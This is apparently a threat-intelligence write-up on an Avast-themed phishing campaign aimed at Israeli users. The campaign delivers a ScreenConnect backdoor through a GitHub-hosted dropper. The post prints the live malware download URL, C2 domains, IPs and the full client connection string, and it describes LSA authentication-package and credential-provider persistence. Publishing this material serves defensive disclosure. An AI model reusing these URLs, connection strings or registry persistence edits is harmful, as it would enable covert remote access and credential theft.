Unmasking Avast-Themed Malware Operation

By: Maor Dayan and Assaf Hazan | April 28, 2025

Introduction: A Suspicious Receipt Leads to Discovery

Last week, what appeared to be a routine Avast antivirus purchase confirmation appeared in my inbox. As a security professional, I’ve developed a habit of scrutinizing such emails, and fortunately, this vigilance paid off. A subtle inconsistency in the header caught my attention, leading to a comprehensive investigation that ultimately revealed a sophisticated malware delivery operation specifically targeting Israeli businesses and individuals. In collaboration with Assaf Hazan, we dissected this campaign, uncovering a well-orchestrated attack leveraging legitimate tools to achieve persistent access to victims’ systems.

This article documents our findings in detail, providing a thorough technical analysis of the attack chain, malware capabilities, and potential attribution. We hope this research equips security professionals with the knowledge needed to detect and mitigate similar threats.

The Phishing Lure: Crafting a Convincing Deception

The initial attack vector was a meticulously crafted phishing email designed to appear as a legitimate Avast antivirus purchase confirmation. The social engineering aspect of this campaign deserves attention as it employed several techniques to appear credible.

The Phishing Email Impersonating Avast

The phishing email included the following convincing elements:

• Professional Avast branding with the correct logo and brand colors
• A legitimate-looking invoice for “Avast Ultimate” (a real product) for multiple devices
• Pricing that matched actual Avast offerings (ranges): $139.99 with a $68.11 discount
• A seemingly authentic order ID (ADP2110306341)
• Recent order date (April 24, 2025 or 19th date for the previous emails)
• Reference to a legitimate payment processor: “DigRiv Ireland, Ltd, a Digital River Company”
• A plausible activation code (R2QFZ7-YSNUSJ-5UCGMN)
• Multiple download options: “Download for PC,” “Download for Mac,” and Google Play Store for Android
• A “See installation instructions” link to further the illusion of legitimacy

However, careful analysis revealed several red flags:

• The sender domain did not match official Avast communications (using addresses like receipt@avast-billing.com or notification-emails.avast.com@oosthoutnetwork.nl)
• Slight formatting inconsistencies not typically found in legitimate communications
• Suspicious URL structures embedded in the “Download” buttons
• Unusual tracking parameters attached to the links

Our team confirmed three similar phishing emails were received between April 19 and April 24, suggesting an active, ongoing campaign targeting multiple recipients.

The Attack Chain: Following the Redirection Maze

By analyzing the embedded links and performing controlled executions in a sandboxed environment, we mapped the complete attack chain from initial click to system compromise.

Stage 1: Multi-Level URL Redirection

When a victim clicks on the “Download for PC” button, they’re directed through a sophisticated redirection chain:

1. Initial click leads to an Israeli domain: https://links.ravsend.co.il/?lid=38192499&sid=633243153
2. This redirects to a tracking domain: https://8objp.bemobtrk.com/go/aa19f9ca-80da-4651-a132-bffe291ed419
3. The tracking domain sets cookies for monitoring, including:

• bemob-viewer-id=b7fa6ebe-6ada-4592-a10c-56ef8e7f8da7
• bemob-uniq-visit:aa19f9ca-80da-4651-a132-bffe291ed419=1
• bemob-click-id=8wrY7ZWMuFdAkJtkaXrC4Y

1. Final redirection leads to GitHub: https://raw.githubusercontent.com/AvastIL/Avast/refs/heads/main/Avast.exe

The use of GitHub as a malware hosting platform is particularly noteworthy. GitHub enjoys a high level of trust among both users and security solutions, and connections to it are rarely blocked by corporate firewalls or security products. Furthermore, the attacker’s choice of username — “AvastIL,” with “IL” indicating Israel — clearly signifies an intent to target Israeli users specifically.

Stage 2: Execution and Initial Deployment

Once the Avast.exe file is downloaded and executed, it initiates the following process:

1. The malware performs environmental checks, reading the computer name and machine GUID from the registry
2. It checks system language settings, likely to confirm targeting Israeli users
3. Creates temporary files in the user’s temp directory
4. Drops several embedded components, including the ScreenConnect (ConnectWise Control) client software

Screenshot from Kaspersky Sandbox

The installer appears as a legitimate Windows application with normal dialog boxes, furthering the deception as shown in the actual screenshot we captured during our analysis. The malware’s installer window displays “ScreenConnect Client (0188ac31e11665df)” and asks the user to “Please wait while Windows configures ScreenConnect Client,” complete with a progress bar.

Analysis of the MSI installation process revealed the use of silent installation parameters (“/qn”) and the passing of certificate information for C2 authentication, as shown in this command line:

{ EncodedCertificateChain = {7}, Digest = {8}, Signature = {9} }
ScreenConnect.ScreenConnect.ClientSetup.msi;ScreenConnect.ClientSetup.msi /i "" /qn msiexec.exe

Kaspersky analysis of the sample identified it as:

• Detection: HEUR:Trojan.Win32.Generic
• Classification: Remote Access Tool / Backdoor

Stage 3: Persistence and System Modification

Our analysis of the suspicious activities log revealed extensive system modifications made by the malware:

Service Creation and C2 Communication Setup: The malware creates a Windows service named “ScreenConnect Client (0188ac31e11665df)” for persistence, but crucially, this service is not just a simple Windows service — it’s configured to actively listen for and establish connections to the attacker’s command and control infrastructure:

• Service_path: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c="

This service establishes a persistent encrypted connection to the C2 server, using a unique session identifier and an encrypted authentication key. The service continuously listens for incoming commands from the attackers.

Authentication Package Modification: Perhaps most concerning, the malware modifies the Windows authentication packages via registry:

• Registry_key: "\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa" Registry_value: "msv1_0�$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsAuthenticationPackage.dll" Registry_value_name: "Authentication Packages"

This technique allows the malware to potentially intercept credentials by integrating its own DLL into Windows authentication processes.

COM Object Registration: The malware registers COM objects to further establish persistence:

• Registry_key: "\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32" Registry_value: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsCredentialProvider.dll"

File Association Creation: It establishes a custom URI handler for launching the ScreenConnect client:

• Registry_key: "\REGISTRY\MACHINE\SOFTWARE\Classes\sc-0188ac31e11665df\shell\open\command" Registry_value: "\"$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsClient.exe\" \"%1\""

System Restore Point Creation: Interestingly, the malware creates a System Restore point using SrTasks.exe with the ExecuteScopeRestorePoint parameter. This unusual behavior might serve to:

• Ensure system stability for long-term access
• Create a fallback mechanism if the infection is detected
• Prevent system instability that could lead to premature detection

Process Chain from Kaspersky Threat intelligence

The process chain, as visualized in our second screenshot, shows the hierarchical execution from initial dropper through multiple stages of the attack, including numerous high-severity system modifications.

Technical Analysis: ScreenConnect as a Remote Access Trojan

Binary Analysis

The downloaded executable (Avast.exe) has the following properties:

• MD5: 14B3201E37D5AF8CBC6DBF810855F6C8
• SHA1: 4C9D0DE6A87F9D46CC475C572FF890D4F81BB242
• SHA256: 2BA3B56E91B74EEC4908A234CE652D50615B52B527430AD0BE35CB53ACC6EAF4
• File size: 5,641,088 bytes
• File type: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections

We also analyzed a second sample:

• MD5: 0B23AC3DC2B9C49944CE7C9C405ED501
• SHA1: 5E2071A1DA17233D69B0EB03D16F18B91D222A2E
• SHA256: 5F8AC3ECC4F610E26E3805196F43322F60875B6983BEBC513A82A0F570DB9D32

Static analysis revealed the malware was compiled on November 18, 2022 (timestamp: 2022:11:18 20:10:20+00:00), using LinkerVersion 14.33. This suggests the campaign may have been running significantly longer than initially suspected, with the threat actors possibly refining their techniques over time.

The malware’s internal structure shows it’s primarily a dropper for the ScreenConnect components. While it doesn’t employ advanced packing techniques, it does contain substantial embedded components and uses multiple obfuscation techniques to evade initial detection.

Dropped Files Analysis

The malware deploys numerous files, with the most significant being components of the ScreenConnect remote access tool:

• ScreenConnect.ClientService.exe (MD5: 752D5CDDA2A1D93D27E38F98A5D23FC2)
• ScreenConnect.WindowsClient.exe (MD5: 9562334DD9A47EC1239A8667DDC1F01C)
• ScreenConnect.Client.dll (MD5: 7EE2543520D72FD54827F3D11A21EF8D)
• ScreenConnect.Windows.dll (MD5: 94216EB90CA53FBB175F0EE6ADBFB663)
• ScreenConnect.Core.dll (MD5: 1DB8B9FA0BDCBFAAB807F715C288C19A)
• ScreenConnect.WindowsAuthenticationPackage.dll (MD5: 5ADCB5AE1A1690BE69FD22BDF3C2DB60)
• ScreenConnect.WindowsCredentialProvider.dll (MD5: A81497B417D4F67EA6CAB399BD3A71F8)
• Various supporting configuration files (.config)

The intermediate installation process also leverages Microsoft deployment technologies and DLLs, including:

• Microsoft.Deployment.WindowsInstaller.dll
• Microsoft.Deployment.Compression.dll
• Microsoft.Deployment.Compression.Cab.dll

ScreenConnect: A Legitimate Tool Turned Malicious

ScreenConnect (now branded as ConnectWise Control) is a legitimate remote support and access tool widely used by IT departments and managed service providers. However, when deployed surreptitiously, it effectively functions as a full-featured Remote Access Trojan (RAT).

What makes ScreenConnect particularly dangerous as an attack tool:

1. Complete Remote Control: It provides full interactive desktop access, allowing attackers to navigate the system as if physically present
2. File Transfer Capabilities: Attackers can upload additional malware or exfiltrate sensitive data
3. Keystroke Logging: The tool can capture keystrokes, potentially compromising credentials
4. Command Execution: Attackers can run arbitrary commands with the privileges of the logged-in user
5. Credential Access: The authentication package modifications suggest the attackers may be attempting to collect domain credentials
6. Stealth Operation: As a legitimate tool, it’s less likely to trigger traditional antivirus detection
7. Persistent Access: The service-based installation ensures the tool remains running even after system reboots

The use of legitimate remote administration tools (LRATs) in attacks has grown increasingly common as threat actors seek to blend their activities with normal IT operations. This “living off the land” approach complicates detection, as the tools themselves aren’t inherently malicious.

Network Communications and Command & Control

The malware establishes multiple network connections to maintain control over the compromised system:

Primary C2 Connection

The main command and control channel connects to:

screen.solandalucia-carcosmetics.com:8041

In some variants, we observed connections to an alternative server:

screen.nadlan.center:8041

The specific C2 infrastructure used:

• C2 Domain: screen.nadlan.center
• C2 IP: 82.165.164.194 (port 8041)
• Alt C2 Domain: screen.solandalucia-carcosmetics.com
• Alt C2 IP: 79.127.221.55 (port 8041)

The complete connection string includes extensive parameters for authentication:

?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c=

The parameter k= contains a long, encrypted string that likely includes authentication information and possibly system identifiers. The s= parameter appears to be a unique session identifier (02ba7bd3-9124-4ed0-87b8-a9910b7d9b42) that may be used by the attackers to track and organize compromised systems.

Network Indicators

Several domain names associated with this campaign contain references to Israel or Israeli businesses:

• “solandalucia-carcosmetics.com” appears to blend Spanish (“sol andalucia” — sun of Andalucia) with “carcosmetics”
• “nadlan.center” uses the Hebrew term “nadlan” (נדל”ן) which means “real estate”
• The GitHub account “AvastIL” with “IL” representing Israel’s country code

This naming pattern reinforces our assessment that the campaign specifically targets Israeli entities, possibly in sectors like real estate and cosmetics.

Suspicious Activities and Severity Assessment

Our analysis of the suspicious activities data revealed several high-severity actions performed by the malware:

HIGH SEVERITY (660): Modification of authentication packages via registry

This is particularly concerning as it could allow credential theft

HIGH SEVERITY (660): Suspicious service creation

Ensures persistence of the malware after system reboots

MEDIUM SEVERITY (500): Popular remote administration tools execution

Multiple instances of ScreenConnect components being executed

LOW SEVERITY (290): Various supporting activities including:

• Unknown DLL launches via rundll32
• COM object registration
• Standard service creation
• Double file extension file creation
• File association modifications

The cumulative risk posed by these activities is substantial, indicating a sophisticated and determined threat actor with a focus on maintaining persistent access to compromised systems.

Target Analysis: Why Israel?

The campaign shows clear signs of specifically targeting Israeli entities:

1. Domain Selection: Using an Israeli domain (links.ravsend.co.il) in the redirect chain
2. GitHub Username: “AvastIL” with the “IL” country code for Israel
3. Domain Names: Using Hebrew terms like “nadlan” (real estate) in C2 domains
4. Environment Checks: The malware checks system language settings before proceeding

This targeting suggests the campaign is not opportunistic but rather a focused operation against Israeli organizations and individuals. While our investigation couldn’t definitively determine which sectors were most targeted, the domain names suggest possible focus on real estate and commercial businesses.

Possible Attribution

DISCLAIMER: The following attribution analysis is speculative and based on behavioral patterns only. Definitive attribution requires additional evidence and should be approached with caution.

Several techniques employed in this campaign bear similarities to operations previously attributed to the MuddyWater threat group (also known as Static Kitten, MERCURY, or Seedworm). MuddyWater is a cyber espionage group believed to be operating since at least 2017, primarily targeting the Middle East.

Similarities to MuddyWater’s known tactics include:

1. Use of Legitimate Remote Tools: MuddyWater has a documented history of leveraging various legitimate remote administration tools, including ScreenConnect, TeamViewer, and AnyDesk to maintain access to compromised systems. This pattern of abusing legitimate remote access software is consistent with their established tactics.
2. Multi-Stage Deployment: The group often employs multi-stage deployment processes similar to what we observed, with sophisticated redirection chains leading to the final payload.
3. GitHub for Distribution: Previous MuddyWater campaigns have utilized GitHub repositories for malware distribution, particularly targeting Middle Eastern entities.
4. Israel-Specific Targeting: The group has consistently targeted entities in the Middle East, including specific campaigns against Israeli organizations as documented by Israel’s National Cyber Directorate (reference: CERT-IL Alert W-1728, https://www.gov.il/BlobFolder/reports/alert_1728/he/ALERT-CERT-IL-W-1728.pdf).
5. Authentication Package Modifications: Similar techniques for persistence and credential access have been observed in previous MuddyWater operations.

However, several factors prevent us from making a definitive attribution:

1. These techniques are not exclusive to MuddyWater and could be employed by other threat actors
2. The observed tactics could represent mimicry or a false flag operation
3. We lack sufficient telemetry data across multiple victims to establish a broader pattern
4. The command and control infrastructure does not conclusively match known MuddyWater operations

Without additional evidence, we can only note the similarities while acknowledging that definitive attribution to MuddyWater or any other specific threat actor would be premature.

Comprehensive Indicators of Compromise (IOCs)

Email Indicators

• From: receipt@avast-billing.com, notification-emails.avast.com@oosthoutnetwork.nl
• Subject: “Thanks again for choosing Avast! Your invoice”
• References to activation code: R2QFZ7-YSNUSJ-5UCGMN
• Order ID: ADP2110306341
• Order date: April 24, 2025

URLs and Domains

• Initial redirect: https://links.ravsend.co.il/?lid=38192499&sid=633243153
• Secondary redirect: https://8objp.bemobtrk.com/go/aa19f9ca-80da-4651-a132-bffe291ed419
• Malware download: https://raw.githubusercontent.com/AvastIL/Avast/refs/heads/main/Avast.exe
• GitHub account: https://github.com/AvastIL/
• GitHub repository: https://github.com/AvastIL/Avast

Command and Control Servers

• Primary C2: screen.nadlan.center:8041 (IP: 82.165.164.194)
• Secondary C2: screen.solandalucia-carcosmetics.com:8041 (IP: 79.127.221.55)

Session Identifiers (Multiple Variants)

• s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42
• s=2769ebf5-effd-4762-a041-d5641541438e
• s=cd8ad310-dfbd-44ed-8a96-4ad27a6b0d3a

File Hashes

Main Dropper:

Sample 1:

• MD5: 14B3201E37D5AF8CBC6DBF810855F6C8
• SHA1: 4C9D0DE6A87F9D46CC475C572FF890D4F81BB242
• SHA256: 2BA3B56E91B74EEC4908A234CE652D50615B52B527430AD0BE35CB53ACC6EAF4

Sample 2:

• MD5: 0B23AC3DC2B9C49944CE7C9C405ED501
• SHA1: 5E2071A1DA17233D69B0EB03D16F18B91D222A2E
• SHA256: 5F8AC3ECC4F610E26E3805196F43322F60875B6983BEBC513A82A0F570DB9D32

ScreenConnect Components:

ScreenConnect.ClientService.exe

• MD5: 752D5CDDA2A1D93D27E38F98A5D23FC2

ScreenConnect.WindowsClient.exe

• MD5: 9562334DD9A47EC1239A8667DDC1F01C

ScreenConnect.Client.dll

• MD5: 7EE2543520D72FD54827F3D11A21EF8D

ScreenConnect.Windows.dll

• MD5: 94216EB90CA53FBB175F0EE6ADBFB663

ScreenConnect.Core.dll

• MD5: 1DB8B9FA0BDCBFAAB807F715C288C19A

ScreenConnect.WindowsAuthenticationPackage.dll

• MD5: 5ADCB5AE1A1690BE69FD22BDF3C2DB60

ScreenConnect.WindowsCredentialProvider.dll

• MD5: A81497B417D4F67EA6CAB399BD3A71F8

Registry Modifications

Authentication Package Modification:

Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
Value: Authentication Packages
Data: msv1_0�$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsAuthenticationPackage.dll

Service Creation:

Key: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\ScreenConnect Client (0188ac31e11665df)
Value: ImagePath
Data: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=screen.solandalucia-carcosmetics.com&p=8041&s=02ba7bd3-9124-4ed0-87b8-a9910b7d9b42&k=BgIAAACkAABSU0ExAAgAAAEAAQBltUxPtApXYCKqHlwsOhDR%2bVTLkSdaDbXXo692Lv4kQu5IL8x%2b4bbPDwKc63gLQKKjFOPFldfWh2l7rh0PZjZSr7Pggd5Et%2fMjzQKW2CRoU4B7WEjY3%2fGYIjWO2U4qZkTWNUiY4xCs2hpwnXzxVv%2fG4BtfCNpoP7DkqdsE82ld3HTkdlvn5g5gaqcUXh8qvjJVhLqVLk90XROn0PGBpNiGoMudP8rHBa52noZbSs7znjpH2Oh9fJlnRXGPmTRC1fOl%2bzyDTDWWuDpWftQp4GxYcUr3OOy63kEOq%2fwH793ylATkfb3Zde3q%2bh8uetT8E7mcpEAhU4agrzauokEDbcCh&c=solandalucia&c=&c=&c=&c=&c=&c=&c="

COM Object Registration:

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32
Value: (Default)
Data: $programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsCredentialProvider.dll

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-494A-C02BCD9B10BD}\InprocServer32
Value: ThreadingModel
Data: Apartment

URI Handler:

Key: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-0188ac31e11665df\shell\open\command
Value: (Default)
Data: "$programfiles\ScreenConnect Client (0188ac31e11665df)\ScreenConnect.WindowsClient.exe" "%1"

Detection Opportunities

Network Detection

• Block outbound connections to the identified C2 domains and IPs
• Alert on connections to non-standard ports (8041)
• Monitor for GitHub raw content downloads of executable files
• Implement DNS filtering to block connections to known malicious domains

Email Security

• Block emails with the identified sender domains
• Flag emails containing Avast invoices with the specific format pattern
• Implement brand impersonation detection for security vendors
• Deploy DMARC, SPF, and DKIM to reduce email spoofing possibilities

Endpoint Security

• Monitor for unexpected ScreenConnect client installations
• Alert on service creation with ScreenConnect or similar remote administration tools
• Implement application control to prevent unauthorized remote access software installation
• Monitor registry modifications, particularly to authentication packages and COM registrations
• Deploy an Endpoint Detection and Response (EDR) solution capable of detecting suspicious process chains

Mitigation Steps if Compromised

If you believe your system has been compromised by this malware:

1. Disconnect affected systems from the network immediately
2. Terminate ScreenConnect processes and services
3. Remove registry persistence mechanisms
4. Reset all credentials used on the affected system
5. Conduct thorough forensic analysis to determine extent of compromise
6. Use the provided IOCs to hunt for potential compromises in your environment

Conclusion: Beyond a Single Attack

This campaign demonstrates the evolving sophistication of targeted attacks against Israeli entities. Several aspects of this operation are particularly concerning:

1. Use of Legitimate Tools: By leveraging ScreenConnect, the attackers reduce their chances of detection by traditional security tools
2. Sophisticated Social Engineering: The well-crafted Avast-themed lure shows careful research and attention to detail
3. Deep System Integration: The modification of authentication packages indicates a focus on long-term access and potential credential theft
4. Infrastructure Setup: The dedicated C2 domains suggest a well-resourced and organized threat actor
5. Targeted Focus: The clear targeting of Israeli entities indicates a deliberate intelligence gathering operation

The campaign appears to be part of a broader effort targeting Israeli businesses and individuals across multiple sectors. The specific focus on Israel, combined with the technical sophistication and potential links to known threat actors like MuddyWater, suggests this campaign may have intelligence gathering motives beyond simple financial gain.

As defenders, we must remain vigilant against such evolving threats. By understanding the techniques employed in this campaign, organizations can better position their defenses to detect and respond to similar attacks. The IOCs and detection rules provided in this article serve as a starting point for threat hunting and enhancing security postures against this specific threat and related campaigns.

Note: If you believe you may have been targeted by this or a similar campaign, isolate the affected system immediately, change all passwords from a clean device, and contact your security team or a cybersecurity professional. This research is shared to help defenders protect their organizations from similar threats.